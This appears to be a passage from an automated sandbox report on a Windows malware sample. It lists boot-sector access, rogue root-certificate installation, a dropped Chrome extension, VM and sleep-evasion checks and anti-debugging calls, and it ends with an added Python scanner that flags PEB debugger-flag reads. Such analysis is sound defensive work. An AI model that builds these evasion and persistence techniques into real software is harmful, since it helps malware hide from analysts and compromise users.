Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d | 0_2_1001DA70
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | File created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Roaming\1612045890161.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d | 0_2_1001D7E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d | 0_2_1001DA70
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d | 3_2_1001D7E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445BD3 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00445BD3
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100204C0 | 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100204C0 | 3_2_100204C0
Uses ping.exe to sleep
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA | 0_2_10019780
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100204C0 | 3_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100204C0 | 0_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe TID: 5436 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 4928 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 3920 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW | 0_2_0042A5EF
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001A170 FindFirstFileA,FindClose | 0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001A170 FindFirstFileA,FindClose | 3_2_1001A170
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004594D0 GetModuleHandleW,GetProcAddress,GetSystemInfo | 0_2_004594D0
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284702540.0000000003F37000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter}V\
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.274136124.00000000007A8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWZ
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.261822382.0000000000799000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: ecvB803.tmp.11.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4f67defbf95d422b8052c59b06ee26b9&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284726946.0000000003F64000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent
Hides threads from debuggers
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugFlags
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00446490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00419AD9 GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,_strlen,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,ReadFile,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044A9CB SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044A9EE SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10015354 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10015376 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B461F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
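The "mov eax, dword ptr fs:[00000030h]" hits above only say that a function fetches the PEB pointer; what matters to an analyst is which PEB field is read next (BeingDebugged at +0x02, ProcessHeap at +0x18 for the heap-flags check, NtGlobalFlag at +0x68), because that is what has to be patched or hooked to get past the check. The scanner below finds every 32-bit `mov r32, fs:[30h]` encoding and classifies the load that follows it. It is an added example written for this page, not code from the sample or from Joe Sandbox; the input bytes are constructed, and the 0x10000000 base address is an assumption chosen to line up with the 0_2_1001xxxx function addresses the report prints.

```python
"""Byte-pattern scanner for 32-bit PEB reads (mov r32, fs:[30h]) and the
debugger-flag loads that usually follow them.

Added example for this report, not code from the sample or from Joe Sandbox.
SAMPLE_CODE is constructed; the 0x10000000 base is an assumption."""

FS_PREFIX = 0x64
PEB_DISP = b"\x30\x00\x00\x00"  # fs:[0x30] = TEB.ProcessEnvironmentBlock on 32-bit Windows

# ModRM byte of `mov r32, fs:[disp32]` (opcode 8B, mod=00 rm=101) -> destination register
MODRM_TO_REG = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx", 0x35: "esi", 0x3D: "edi"}
# rm field that names the same register when it is used as a base in [reg+disp8]
REG_TO_RM = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esi": 6, "edi": 7}

# PEB32 fields that anti-debug code reads right after fetching the PEB pointer
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x18: "ProcessHeap",      # followed by Heap.Flags / Heap.ForceFlags checks
    0x68: "NtGlobalFlag",     # FLG_HEAP_* bits (mask 0x70) are set under a debugger
}


def _field_after(code, j, reg):
    """If the instruction at offset j loads [reg+disp8], return the PEB field name, else None."""
    rm = REG_TO_RM[reg]
    n = len(code)
    disp = None
    # movzx r32, byte ptr [reg+disp8]   0F B6 /r   (mod=01)
    if j + 4 <= n and code[j] == 0x0F and code[j + 1] == 0xB6 and (code[j + 2] & 0xC7) == (0x40 | rm):
        disp = code[j + 3]
    # mov r8/r32, [reg+disp8]           8A /r, 8B /r
    elif j + 3 <= n and code[j] in (0x8A, 0x8B) and (code[j + 1] & 0xC7) == (0x40 | rm):
        disp = code[j + 2]
    # cmp byte ptr [reg+disp8], imm8    80 /7 ib
    elif j + 4 <= n and code[j] == 0x80 and code[j + 1] == (0x78 | rm):
        disp = code[j + 2]
    if disp is None:
        return None
    return PEB_FIELDS.get(disp, "PEB+0x%02x" % disp)


def find_peb_reads(code, base=0x10000000):
    """Linear byte scan for `mov r32, fs:[30h]`; one dict per hit with virtual address,
    destination register and the PEB field read next (None if the follow-up is not recognised).
    A linear sweep can match inside unrelated instruction bytes; treat hits as candidates."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        reg, length = None, 0
        if code[i] == FS_PREFIX:
            # short form  64 A1 disp32          (mov eax, fs:[disp32])
            if code[i + 1:i + 2] == b"\xA1" and code[i + 2:i + 6] == PEB_DISP:
                reg, length = "eax", 6
            # general form 64 8B /r disp32      (mov r32, fs:[disp32])
            elif code[i + 1:i + 2] == b"\x8B" and i + 7 <= n and code[i + 2] in MODRM_TO_REG \
                    and code[i + 3:i + 7] == PEB_DISP:
                reg, length = MODRM_TO_REG[code[i + 2]], 7
        if reg is None:
            i += 1
            continue
        hits.append({"va": base + i, "reg": reg, "field": _field_after(code, i + length, reg)})
        i += length
    return hits


def report_line(hit):
    """Render a hit the way the sandbox report prints it."""
    return "%08X mov %s, dword ptr fs:[00000030h]" % (hit["va"], hit["reg"])


def summarize(code, base=0x10000000):
    """Map each recognised PEB field to the addresses that read it."""
    out = {}
    for h in find_peb_reads(code, base):
        out.setdefault(h["field"] or "unclassified", []).append(h["va"])
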